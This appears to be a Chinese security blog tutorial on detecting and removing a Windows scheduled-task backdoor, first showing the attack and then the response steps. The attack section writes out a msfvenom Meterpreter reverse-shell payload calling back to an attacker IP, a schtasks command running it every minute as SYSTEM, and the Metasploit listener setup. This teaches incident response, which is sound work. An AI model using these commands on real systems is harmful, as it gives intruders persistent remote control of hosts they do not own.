Windows后门应急(二)--计划任务后门分析与处置|Windows取证分析

📢 免责声明

本文所述技术仅用于合法授权的安全研究、教学演示及防御机制开发。作者及发布平台不承担因读者误用、滥用本内容所导致的任何法律责任。请严格遵守《中华人民共和国网络安全法》及相关法律法规。

1.4.1. 攻击背景与前提条件

  • 攻击者已通过漏洞利用、弱口令等方式 getshell

  • 已获取目标服务器 Administrator 权限

  • 目标系统:Windows Server 2016

  • 目标目的:权限维持(Persistence)


1.4.2. 计划任务后门原理概述

计划任务后门是 Windows 环境中极为常见的一种权限维持手段,其核心思想是:

  • 利用 Windows 任务计划程序(Task Scheduler),定时或触发执行恶意程序,实现持续控制。

特点

  • 隐蔽性强(不依赖自启动项)

  • 稳定性高(系统原生机制)

  • 不易被一次性排查发现

1.4.3. 攻击实战:创建计划任务后门

⚠️ 本节用于理解攻击原理,仅用于应急响应与防御研究


1.4.3.1. 生成 EXE 类型后门程序

使用 MSF 生成反弹 shell 的 Windows 可执行文件:

复制代码
msfvenom -p windows/meterpreter/reverse_tcp \
lhost=198.168.1.9  \
lport=8888 \
-f exe -o 0xSec.exe

参数说明:

  • lhost

    :攻击者监听主机 IP

  • lport

    :攻击者监听端口

  • 0xSec.exe

    :生成的后门程序


1.4.3.2. 创建计划任务

0xSec.exe 上传至目标服务器(示例路径):

复制代码
C:\Users\Administrator\Desktop\0xSec.exe

在目标机上执行以下命令,创建名为 0xSec 的计划任务:

复制代码
schtasks /create /tn 0xSec /sc minute /mo 1 ^
/tr C:\Users\Administrator\Desktop\0xSec.exe ^
/ru system /f

参数说明:

  • /tn 0xSec

    :任务名

  • /sc minute /mo 1

    :每 1 分钟执行一次

  • /tr

    :执行的程序路径

  • /ru system

    :以 SYSTEM 权限运行

  • /f

    :强制创建

👉 此时后门已具备 SYSTEM 权限 + 定时执行能力


1.4.3.3. 监听反弹 Shell

攻击者本地 MSF 监听:

复制代码
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 198.168.1.9
set lport 8888
exploit

一分钟后,目标主机会主动回连,权限维持成功。


1.4.4. 应急响应:如何发现计划任务后门

1.4.4.1. 网络层异常发现(TCPView)

工具下载地址https://learn.microsoft.com/en-us/sysinternals/downloads/tcpview

1.4.4.1.1. 为什么不用 netstat -ano
  • 计划任务是 周期性执行

  • netstat

    只能看到 当前瞬时连接

  • 很容易错过异常行为


1.4.4.1.2. 使用 TCPView 进行排查

TCPView 可实时展示:

  • 进程名

  • PID

  • 本地 / 远程 IP + 端口

  • 连接状态(颜色变化)

发现异常现象:

  • 进程名:0xSec.exe

  • 远程地址:198.168.1.9:8888

  • 连接状态:红绿交替(周期性)

  • PID:184192(示例)


1.4.4.1.3. 根据 PID 定位文件路径
复制代码
wmic process get name,executablepath,processid | findstr 184192

输出示例:

复制代码
C:\Users\Administrator\Desktop\0xSec.exe         0xSec.exe        184192
1.4.4.1.4. TCPView中双击获取文件路径

1.4.4.2. 行为分析判断

综合现象判断:

  • 程序周期性联网

  • 间隔约 1 分钟

  • 非系统正常服务

  • 执行路径异常(桌面)

👉高度怀疑存在计划任务后门


1.4.4.3. 查看计划任务(关键证据)

路径:

复制代码
控制面板 → 管理工具 → 任务计划程序

发现异常任务:

  • 任务名称:0xSec

  • 执行程序:C:\Users\Administrator\Desktop\0xSec.exe

  • 执行频率:每 1 分钟

  • 创建者:Administrator

结论:

攻击者已获取管理员权限,并植入计划任务后门


1.4.5. 处置流程(应急响应)

先断执行 → 再杀进程 → 再删文件


1.4.5.1. 删除计划任务
复制代码
schtasks /delete /tn 0xSec /f
1.4.5.2. 结束正在运行的后门进程
复制代码
taskkill /im 0xSec.exe /f
1.4.5.3. 删除恶意程序
复制代码
del C:\Users\Administrator\Desktop\0xSec.exe

1.4.5.4. 后续加固建议
  • 排查其他计划任务(一次性、触发型)

  • 审计安全日志(4698 / 4702)

  • 检查启动项、服务、自启动注册表

  • 重置管理员账户密码

  • 核查是否存在其他权限维持手段


1.4.5.5. 默认4698,4720是没有的,只有在 👉 启用了"计划任务审计策略"情况下才会有日志记录

开启"计划任务审计策略"

WIN+R

复制代码
gpedit.msc

本地组策略编辑器

→ 计算机配置

→ Windows 设置

→ 安全设置

→ 高级审核策略配置

→ 系统审核策略

→ 对象访问

→ 审核其他对象访问事件

再次生成计划任务,筛选事件,得到任务名称:0xSec,命令:C:\Users\Administrator\Desktop\0xSec.exe


1.4.6. 应急响应视角总结

  • 计划任务是 Windows 后门中最常见的权限维持方式之一

  • 排查重点不只是文件,而是:

    • 周期性网络行为
    • 任务计划程序
  • TCPView + 任务计划程序 = 高效发现组合

一句话总结给大家用:

看到"周期性联网的陌生进程",第一反应就该去看计划任务。

相关推荐
harrain3 小时前
windows下载安装MySQL9.5的缺少Redistributable问题解决
windows·mysql
大模型玩家七七4 小时前
技术抉择:微调还是 RAG?——以春节祝福生成为例
android·java·大数据·开发语言·人工智能·算法·安全
福大大架构师每日一题4 小时前
redis 8.4.1 正式发布:安全升级、性能强化与多模块重大修复详解
数据库·redis·安全
x-cmd4 小时前
[x-cmd] age v1.3.0:面向未来的文件加密工具链升级
安全·文件·量子计算·加密·x-cmd·age
够快云库7 小时前
2026企业数据安全架构实战复盘与选型指南:基于“有序存、管、用”的一体化方案
安全·安全架构
PythonFun7 小时前
职场小白如何一键安装Windows系统
windows
一目Leizi8 小时前
Windows 系统下安装 Ubuntu 双系统详细教程(图文指南)
linux·windows·ubuntu
new_zhou8 小时前
Windows环境c++开发dump文件生成(优化方案)
c++·windows·qt
乾元8 小时前
加密流量: 不解密情况下通过流特征识别恶意载荷
网络·人工智能·安全·web安全·机器学习·架构·安全架构